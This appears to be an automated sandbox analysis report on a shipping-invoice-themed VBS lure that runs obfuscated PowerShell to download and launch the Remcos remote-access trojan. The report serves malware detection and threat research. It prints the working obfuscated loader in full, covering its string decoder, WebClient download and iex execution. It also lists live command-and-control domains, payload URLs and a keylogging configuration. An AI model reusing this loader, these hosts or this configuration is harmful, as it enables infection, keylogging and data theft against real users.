$Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcot

Snort Signatures

ET TROJAN Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.4 - Destination IP: 206.123.148.198

Timestamp:	07/02/24-07:48:47.077363
SID:	2032776
Source Port:	49742
Destination Port:	3980
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.4 - Destination IP: 206.123.148.198

Timestamp:	07/02/24-07:48:03.172003
SID:	2032776
Source Port:	49740
Destination Port:	3980
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: janbours92harbu02.duckdns.org

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "janbours92harbu02.duckdns.org:3980:0janbours92harbu02.duckdns.org:3981:1janbours92harbu03.duckdns.org:3980:0", "Assigned name": "XXL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jmoughoe-DMPW3B", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kpburtts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: janbours92harbu02.duckdns.org	Virustotal: Detection: 10%	Perma Link
Source: janbours92harbu03.duckdns.org	Virustotal: Detection: 7%	Perma Link
Source: janbours92harbu02.duckdns.org	Virustotal: Detection: 10%	Perma Link
Source: http://103.195.237.43/Outgassed.emz	Virustotal: Detection: 13%	Perma Link
Source: https://contemega.com.do/Outgassed.emz	Virustotal: Detection: 6%	Perma Link
Source: http://103.195.237.43	Virustotal: Detection: 11%	Perma Link
Source: http://103.195.237.43/QJqDH201.bin	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for submitted file

Source: Maersk_BL_Invoice_Packinglist.vbs	Virustotal: Detection: 12%			Perma Link
Source: Maersk_BL_Invoice_Packinglist.vbs	ReversingLabs: Detection: 13%

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49740 -> 206.123.148.198:3980
Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49742 -> 206.123.148.198:3980

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: janbours92harbu02.duckdns.org

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 206.123.148.198 ports 3980,3981,0,3,8,9

Uses dynamic DNS services

Source: unknown	DNS query: name: janbours92harbu03.duckdns.org
Source: unknown	DNS query: name: janbours92harbu02.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49740 -> 206.123.148.198:3980

Source: Joe Sandbox View

IP Address: 103.195.237.43 103.195.237.43

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /Outgassed.emz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /QJqDH201.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43

Source: global traffic	HTTP traffic detected: GET /Outgassed.emz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /QJqDH201.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: contemega.com.do
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu03.duckdns.org

Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.1
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.19
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.2
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.23
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.4
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/;
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/O
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Ou
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Out
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outg
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outga
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgas
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgass
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgasse
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.e
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.em
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.emz
Source: powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.emzX
Source: wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.bin
Source: wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binEyessVescontemega.com.do/QJqDH201.bin
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binTq
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binV
Source: powershell.exe, 00000001.00000002.2386862644.00000170247CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://contemega.com.do
Source: wscript.exe, 00000000.00000003.1656474620.000001816A47F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681014882.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680311691.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A480000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656928856.000001816A47F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1680127852.0000018168534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681044219.0000018168535000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP=
Source: wscript.exe, 00000000.00000002.1681014882.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680311691.000001816851B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDu
Source: wscript.exe, 00000000.00000003.1657121988.0000018168591000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657029537.0000018168569000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?67126171c7
Source: powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2386862644.00000170247CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.P
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.c
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.co
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.d
Source: powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/O
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ou
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Out
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outg
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outga
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgas
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgass
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgasse
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.e
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.em
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.emz
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6540.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Monaxial.ShellExecute("P" & Piskefldens, Guidernes96, "", "", Preconsultor187)

Sample has a suspicious name (potential lure to open the executable)

Source: Maersk_BL_Invoice_Packinglist.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4117
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4117	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4117	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo 